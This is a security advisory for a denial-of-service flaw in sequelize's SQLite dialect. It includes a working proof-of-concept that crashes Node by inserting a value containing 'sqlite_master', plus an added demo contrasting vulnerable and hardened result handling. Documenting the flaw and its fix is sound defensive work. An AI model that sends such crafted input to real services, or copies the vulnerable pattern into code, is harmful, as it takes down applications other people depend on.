GMS-2020-771: Denial of Service in sequelize
Versions of sequelize prior to 4.44.4 are vulnerable to Denial of Service (DoS). The SQLite dialect decides how to post-process query results by inspecting the text of the SQL statement it just executed, and on one of those branches it calls .map on the results variable. For statements that return no rows, results is undefined, so the .map call throws a TypeError that the dialect does not catch. Because the exception is raised inside the sqlite3 driver callback rather than inside a Promise executor or a .then handler, it is not turned into a promise rejection: a .catch() on the query promise never sees it, and Node exits with an uncaught exception. An attacker who can get a crafted value into a statement (for example, a string stored through Model.create) can therefore force the exception and crash the Node process.
The following proof-of-concept crashes the Node process:
```javascript
const Sequelize = require('sequelize');

const sequelize = new Sequelize({
  dialect: 'sqlite',
  storage: 'database.sqlite'
});

// Any model will do; the table name plays no part in the crash.
// (The model is named Note here rather than TypeError so it does not
// shadow the global TypeError constructor.)
const Note = sequelize.define('Note', {
  name: Sequelize.STRING,
});

// The inserted value contains the string "sqlite_master". The dialect inspects
// the generated INSERT statement, takes a branch meant for metadata SELECTs,
// and calls .map on an undefined result set. The TypeError is thrown inside
// the sqlite3 callback, so the .catch below never runs: the process exits
// with an uncaught exception.
Note.sync({ force: true })
  .then(() => Note.create({ name: 'SELECT tbl_name FROM sqlite_master' }))
  .catch(err => console.error('not reached:', err));
```
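To show the failure mode without a database, the following is an added example, not sequelize's own code: a simplified model of the bug class with a constructed stand-in for the sqlite3 driver. It puts a vulnerable result formatter that picks its branch by a substring match on the SQL text beside a hardened one that branches on the statement type, and a query wrapper that converts post-processing errors into promise rejections. The driver stub, the statements, the sample rows and all function names are assumptions made for the illustration.

```javascript
'use strict';
// Added illustration (not sequelize's source): a simplified model of the
// SQLite-dialect crash described above, runnable without sqlite3 installed.

// Constructed stand-in for the sqlite3 driver. Like the real driver, it hands
// rows to the callback only for SELECT (Statement#all); for INSERT/UPDATE/
// DELETE (Statement#run) the second callback argument is undefined. The
// callback fires asynchronously, i.e. outside any Promise executor.
function fakeSqliteExec(sql, cb) {
  const rows = /^\s*SELECT\b/i.test(sql)
    ? [{ name: 'Users' }, { name: 'Notes' }]   // constructed sample rows
    : undefined;
  setImmediate(() => cb(null, rows));
}

// Vulnerable pattern: choose the post-processing branch by searching the
// whole SQL text (which includes inlined user data) for a substring. An
// INSERT whose value contains "sqlite_master" takes the SELECT-only branch;
// results is undefined there, so .map throws a TypeError.
function formatResultsVulnerable(sql, results) {
  if (sql.indexOf('sqlite_master') !== -1) {
    return results.map(row => row.name);
  }
  return results;
}

// Hardened pattern: branch on the statement type, never on user-controlled
// text, and treat a missing result set as an empty one.
function formatResultsFixed(sql, results) {
  const isSelect = /^\s*SELECT\b/i.test(sql);
  if (isSelect && /\bsqlite_master\b/i.test(sql)) {
    return (results || []).map(row => row.name);
  }
  return results === undefined ? [] : results;
}

// Dialect-style wrapper as the vulnerable code does it: the formatter runs in
// the driver callback with no try/catch. The executor has already returned by
// then, so a throw here is NOT converted into a rejection; it surfaces as an
// uncaughtException and terminates the process.
function runQueryUnsafe(sql) {
  return new Promise((resolve, reject) => {
    fakeSqliteExec(sql, (err, results) => {
      if (err) return reject(err);
      resolve(formatResultsVulnerable(sql, results));
    });
  });
}

// Hardened wrapper: any error raised while post-processing becomes a
// rejection the caller can handle, so one bad query cannot kill the process.
function runQuerySafe(sql) {
  return new Promise((resolve, reject) => {
    fakeSqliteExec(sql, (err, results) => {
      if (err) return reject(err);
      try {
        resolve(formatResultsFixed(sql, results));
      } catch (e) {
        reject(e);
      }
    });
  });
}

// Constructed statements. The first mirrors the advisory's PoC: the
// attacker-controlled value is inlined into an INSERT.
const MALICIOUS_INSERT =
  "INSERT INTO Notes (name) VALUES ('SELECT tbl_name FROM sqlite_master');";
const LEGIT_SELECT = 'SELECT tbl_name AS name FROM sqlite_master;';

function demo() {
  // Catch the escaped TypeError so the demo can report it instead of dying;
  // anything else is re-thrown so real failures still terminate the process.
  process.once('uncaughtException', e => {
    if (!(e instanceof TypeError)) throw e;
    console.log('escaped the promise chain:', e.constructor.name, e.message);
  });
  runQueryUnsafe(MALICIOUS_INSERT)
    .catch(() => console.log('not reached: .catch never sees the error'));
  runQuerySafe(MALICIOUS_INSERT).then(rows => console.log('fixed insert:', rows));
  runQuerySafe(LEGIT_SELECT).then(rows => console.log('fixed select:', rows));
}

if (typeof require !== 'undefined' && require.main === module) demo();
```

Running the file prints the escaped TypeError from the unsafe path while the .catch handler stays silent, which is the point: once an exception can leave a native-driver callback, handling rejections in application code does not help, and the dialect itself has to guard the post-processing.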
Recommendation
Upgrade to version 4.44.4 or later. Adding a .catch() to the affected query does not mitigate the issue, because the exception is never delivered as a promise rejection; until the upgrade is applied, the only application-level guard is to reject user input containing "sqlite_master" before it reaches a SQLite-backed model.